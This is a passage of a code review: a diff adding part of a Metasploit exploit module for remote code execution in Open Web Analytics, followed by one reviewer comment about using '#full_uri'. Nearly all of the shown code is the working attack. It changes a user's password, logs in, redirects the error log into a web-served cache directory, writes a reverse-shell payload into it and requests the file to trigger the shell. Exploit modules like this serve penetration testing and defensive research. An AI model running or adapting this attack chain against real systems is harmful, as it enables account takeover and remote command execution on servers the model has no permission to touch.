modules/exploits/multi/http/open_web_analytics_rce.rb

```diff
@@ -0,0 +1,295 @@
+    end
+    print_good("Changed the password of '#{username}' to '#{new_password}'")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.loginForm'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'owa_user_id' => username,
+        'owa_password' => new_password,
+        'owa_action' => 'base.login'
+      }
+    )
+
+    redirect = res['location']
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => URI(redirect).path
+    )
+    if res && res.code == 200
+      print_good("Logged in as #{username} user")
+    else
+      fail_with(Failure::Unknown, "An error occurred during the login attempt of user #{username}")
+    end
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.optionsGeneral')
+    )
+
+    nonce = get_update_nonce(res)
+    log_location = '/var/www/html/owa-data/caches/' + shell_filename
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.optionsGeneral'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'owa_nonce' => nonce,
+        'owa_action' => 'base.optionsUpdate',
+        'owa_config[base.error_log_file]' => log_location,
+        'owa_config[base.error_log_level]' => 2
+      }
+    )
+    if !res
+      fail_with(Failure::Unknown, 'An error occurred when attempting to update config!')
+    else
+      print_status('Creating log file')
+    end
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.optionsGeneral'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'owa_nonce' => nonce,
+        'owa_action' => 'base.optionsUpdate',
+        'owa_config[shell]' => reverse_shell
+      }
+    )
+    if !res
+      fail_with(Failure::Unknown, 'An error occurred when attempting to update config!')
+    else
+      print_good('Wrote payload to file')
+    end
+
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "/owa-data/caches/#{shell_filename}")
+    )
+
+    print_good('Triggering payload! Check your listener!')
+    print_status("You can trigger the payload again at '#{shell_url}")
+  end
+
+  def etablish_connection
+    url = get_normalized_url(datastore['RHOSTS'])
+    base_url = url
+    res = nil
+    loop do
+      res = Net::HTTP.get_response(URI.parse(url))
+      url = res['location']
+      break unless res.is_a?(Net::HTTPRedirection)
+    end
+    if !res
+      fail_with(Failure::Unknown, "Could not connect to #{base_url}")
+    else
+      res
+    end
+  end
+
+  def get_normalized_url(url)
+    url += ":#{datastore['RPORT']}/"
+    if datastore['SSL']
+      url = "https://#{url}"
+    else
+      url = "http://#{url}"
+    end
+    url
+  end
```

Comment:
This should be replaced with [`#full_uri`.](https://github.com/rapid7/metasploit-framework/blob/350984bc41fe9698f0d7bec16451c25aa14f0158/lib/msf/core/exploit/remote/http_client.rb#L555)